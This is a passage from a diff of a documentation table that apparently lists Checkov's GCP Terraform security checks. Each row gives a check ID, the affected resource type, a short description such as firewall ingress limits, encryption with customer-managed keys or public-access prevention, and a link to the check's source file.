Terraform | [GoogleComputeFirewallUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py) | +| 2319 | CKV_GCP_76 | resource | google_compute_subnetwork | Ensure that Private google access is enabled for IPV6 | Terraform | [GoogleSubnetworkIPV6PrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py) | +| 2320 | CKV_GCP_77 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow on ftp port | Terraform | [GoogleComputeFirewallUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py) | +| 2321 | CKV_GCP_78 | resource | google_storage_bucket | Ensure Cloud storage has versioning enabled | Terraform | [CloudStorageVersioningEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py) | +| 2322 | CKV_GCP_79 | resource | google_sql_database_instance | Ensure SQL database is using latest Major version | Terraform | [CloudSqlMajorVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py) | +| 2323 | CKV_GCP_80 | resource | google_bigquery_table | Ensure Big Query Tables are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryTableEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py) | +| 2324 | CKV_GCP_81 | resource | google_bigquery_dataset | Ensure Big Query Datasets are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py) | +| 2325 | CKV_GCP_82 | resource | google_kms_crypto_key | Ensure KMS keys are protected from deletion | Terraform | [GoogleKMSPreventDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py) | +| 2326 | CKV_GCP_83 | resource | google_pubsub_topic | Ensure PubSub Topics are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [CloudPubSubEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py) | +| 2327 | CKV_GCP_84 | resource | google_artifact_registry_repository | Ensure Artifact Registry Repositories are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [ArtifactRegsitryEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py) | +| 2328 | CKV_GCP_85 | resource | google_bigtable_instance | Ensure Big Table Instances are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigTableInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py) | +| 2329 | CKV_GCP_86 | resource | google_cloudbuild_worker_pool | Ensure Cloud build workers are private | Terraform | [CloudBuildWorkersArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py) | +| 2330 | CKV_GCP_87 | resource | google_data_fusion_instance | Ensure Data fusion instances are private | Terraform | [DataFusionPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py) | +| 2331 | CKV_GCP_88 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted mysql access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3306.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py) | +| 2332 | CKV_GCP_89 | resource | google_notebooks_instance | Ensure Vertex AI instances are private | Terraform | [VertexAIPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py) | +| 2333 | CKV_GCP_90 | resource | google_dataflow_job | Ensure data flow jobs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataflowJobEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py) | +| 2334 | CKV_GCP_91 | resource | google_dataproc_cluster | Ensure Dataproc cluster is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataprocClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py) | +| 2335 | CKV_GCP_92 | resource | google_vertex_ai_dataset | Ensure Vertex AI datasets uses a CMK (Customer Managed Key) | Terraform | [VertexAIDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py) | +| 2336 | CKV_GCP_93 | resource | google_spanner_database | Ensure Spanner Database is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [SpannerDatabaseEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py) | +| 2337 | CKV_GCP_94 | resource | google_dataflow_job | Ensure Dataflow jobs are private | Terraform | [DataflowPrivateJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py) | +| 2338 | CKV_GCP_95 | resource | google_redis_instance | Ensure Memorystore for Redis has AUTH enabled | Terraform | [MemorystoreForRedisAuthEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py) | +| 2339 | CKV_GCP_96 | resource | google_vertex_ai_metadata_store | Ensure Vertex AI Metadata Store uses a CMK (Customer Managed Key) | Terraform | [VertexAIMetadataStoreEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py) | +| 2340 | CKV_GCP_97 | resource | google_redis_instance | Ensure Memorystore for Redis uses intransit encryption | Terraform | [MemorystoreForRedisInTransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py) | +| 2341 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_binding | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | +| 2342 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_member | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | +| 2343 | CKV_GCP_99 | resource | google_pubsub_topic_iam_binding | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | +| 2344 | CKV_GCP_99 | resource | google_pubsub_topic_iam_member | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | +| 2345 | CKV_GCP_100 | resource | google_bigquery_table_iam_binding | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | +| 2346 | CKV_GCP_100 | resource | google_bigquery_table_iam_member | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | +| 2347 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_binding | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | +| 2348 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_member | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | +| 2349 | CKV_GCP_102 | resource | google_cloud_run_service_iam_binding | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | +| 2350 | CKV_GCP_102 | resource | google_cloud_run_service_iam_member | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | +| 2351 | CKV_GCP_103 | resource | google_dataproc_cluster | Ensure Dataproc Clusters do not have public IPs | Terraform | [DataprocPublicIpCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py) | +| 2352 | CKV_GCP_104 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver logging enabled | Terraform | [DataFusionStackdriverLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py) | +| 2353 | CKV_GCP_105 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver monitoring enabled | Terraform | [DataFusionStackdriverMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py) | +| 2354 | CKV_GCP_106 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted http port 80 access | Terraform | [GoogleComputeFirewallUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py) | +| 2355 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | +| 2356 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | +| 2357 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | +| 2358 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | +| 2359 | CKV_GCP_108 | resource | google_sql_database_instance | Ensure hostnames are logged for GCP PostgreSQL databases | Terraform | [GoogleCloudPostgreSqlLogHostname.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogHostname.py) | +| 2360 | CKV_GCP_109 | resource | google_sql_database_instance | Ensure the GCP PostgreSQL database log levels are set to ERROR or lower | Terraform | [GoogleCloudPostgreSqlLogMinErrorStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinErrorStatement.py) | +| 2361 | CKV_GCP_110 | resource | google_sql_database_instance | Ensure pgAudit is enabled for your GCP PostgreSQL database | Terraform | [GoogleCloudPostgreSqlEnablePgaudit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlEnablePgaudit.py) | +| 2362 | CKV_GCP_111 | resource | google_sql_database_instance | Ensure GCP PostgreSQL logs SQL statements | Terraform | [GoogleCloudPostgreSqlLogStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogStatement.py) | +| 2363 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_binding | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | +| 2364 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_member | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | +| 2365 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_policy | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | +| 2366 | CKV_GCP_113 | data | google_iam_policy | Ensure IAM policy should not define public access | Terraform | [GooglePolicyIsPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/gcp/GooglePolicyIsPrivate.py) | +| 2367 | CKV_GCP_114 | resource | google_storage_bucket | Ensure public access prevention is enforced on Cloud Storage bucket | Terraform | [GoogleStoragePublicAccessPrevention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStoragePublicAccessPrevention.py) | +| 2368 | CKV_GCP_115 | resource | google_organization_iam_binding | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) | +| 2369 | CKV_GCP_115 | resource | google_organization_iam_member | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) | +| 2370 | CKV_GCP_116 | resource | google_folder_iam_binding | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) | +| 2371 | CKV_GCP_116 | resource | google_folder_iam_member | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) | +| 2372 | CKV_GCP_117 | resource | google_project_iam_binding | Ensure basic roles are not used at project level. | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) | +| 2373 | CKV_GCP_117 | resource | google_project_iam_member | Ensure basic roles are not used at project level. | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) | +| 2374 | CKV_GCP_118 | resource | google_iam_workload_identity_pool_provider | Ensure IAM workload identity pool provider is restricted | Terraform | [GoogleIAMWorkloadIdentityConditional.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleIAMWorkloadIdentityConditional.py) | +| 2375 | CKV_GCP_119 | resource | google_spanner_database | Ensure Spanner Database has deletion protection enabled | Terraform | [SpannerDatabaseDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDeletionProtection.py) | +| 2376 | CKV_GCP_120 | resource | google_spanner_database | Ensure Spanner Database has drop protection enabled | Terraform | [SpannerDatabaseDropProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDropProtection.py) | +| 2377 | CKV_GCP_121 | resource | google_bigquery_table | Ensure BigQuery tables have deletion protection enabled | Terraform | [BigQueryTableDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableDeletionProtection.py) | +| 2378 | CKV_GCP_122 | resource | google_bigtable_instance | Ensure Big Table Instances have deletion protection enabled | Terraform | [BigTableInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceDeletionProtection.py) | +| 2379 | CKV_GCP_123 | resource | google_container_cluster | GKE Don't Use NodePools in the Cluster configuration | Terraform | [GKEDontUseNodePools.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDontUseNodePools.py) | +| 2380 | CKV_GCP_124 | resource | google_cloudfunctions2_function | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) | +| 2381 | CKV_GCP_124 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) | +| 2382 | CKV2_GCP_1 | resource | google_project_default_service_accounts | Ensure GKE clusters are not running using the Compute Engine default service account | Terraform | [GKEClustersAreNotUsingDefaultServiceAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml) | +| 2383 | CKV2_GCP_2 | resource | google_compute_network | Ensure legacy networks do not exist for a project | Terraform | [GCPProjectHasNoLegacyNetworks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml) | +| 2384 | CKV2_GCP_3 | resource | google_service_account_key | Ensure that there are only GCP-managed service account keys for each service account | Terraform | [ServiceAccountHasGCPmanagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml) | +| 2385 | CKV2_GCP_4 | resource | google_logging_folder_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | +| 2386 | CKV2_GCP_4 | resource | google_logging_organization_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | +| 2387 | CKV2_GCP_4 | resource | google_logging_project_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | +| 2388 | CKV2_GCP_4 | resource | google_storage_bucket | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | +| 2389 | CKV2_GCP_5 | resource | google_project | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) | +| 2390 | CKV2_GCP_5 | resource | google_project_iam_audit_config | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) | +| 2391 | CKV2_GCP_6 | resource | google_kms_crypto_key | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | +| 2392 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_binding | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | +| 2393 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_member | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | +| 2394 | CKV2_GCP_7 | resource | google_sql_database_instance | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) | +| 2395 | CKV2_GCP_7 | resource | google_sql_user | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) | +| 2396 | CKV2_GCP_8 | resource | google_kms_key_ring | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | +| 2397 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_binding | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | +| 2398 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_member | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | +| 2399 | CKV2_GCP_9 | resource | google_container_registry | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | +| 2400 | CKV2_GCP_9 | resource | google_storage_bucket_iam_binding | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | +| 2401 | CKV2_GCP_9 | resource | google_storage_bucket_iam_member | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | +| 2402 | CKV2_GCP_10 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function HTTP trigger is secured | Terraform | [CloudFunctionSecureHTTPTrigger.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml) | +| 2403 | CKV2_GCP_11 | resource | google_project_services | Ensure GCP GCR Container Vulnerability Scanning is enabled | Terraform | [GCRContainerVulnerabilityScanningEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml) | +| 2404 | CKV2_GCP_12 | resource | google_compute_firewall | Ensure GCP compute firewall ingress does not allow unrestricted access to all ports | Terraform | [GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml) | +| 2405 | CKV2_GCP_13 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_duration' is set to 'on' | Terraform | [GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml) | +| 2406 | CKV2_GCP_14 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_executor_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml) | +| 2407 | CKV2_GCP_15 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_parser_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml) | +| 2408 | CKV2_GCP_16 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_planner_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml) | +| 2409 | CKV2_GCP_17 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_statement_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml) | +| 2410 | CKV2_GCP_18 | resource | google_compute_network | Ensure GCP network defines a firewall and does not use the default firewall | Terraform | [GCPNetworkDoesNotUseDefaultFirewall.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPNetworkDoesNotUseDefaultFirewall.yaml) | +| 2411 | CKV2_GCP_19 | resource | google_container_cluster | Ensure GCP Kubernetes engine clusters have 'alpha cluster' feature disabled | Terraform | [GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml) | +| 2412 | CKV2_GCP_20 | resource | google_sql_database_instance | Ensure MySQL DB instance has point-in-time recovery backup configured | Terraform | [GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml) | +| 2413 | CKV2_GCP_21 | resource | google_notebooks_instance | Ensure Vertex AI instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexInstanceEncryptedWithCMK.yaml) | +| 2414 | CKV2_GCP_22 | resource | google_document_ai_processor | Ensure Document AI Processors are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIProcessorEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIProcessorEncryptedWithCMK.yaml) | +| 2415 | CKV2_GCP_23 | resource | google_document_ai_warehouse_location | Ensure Document AI Warehouse Location is configured to use a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml) | +| 2416 | CKV2_GCP_24 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint uses a Customer Managed Key (CMK) | Terraform | 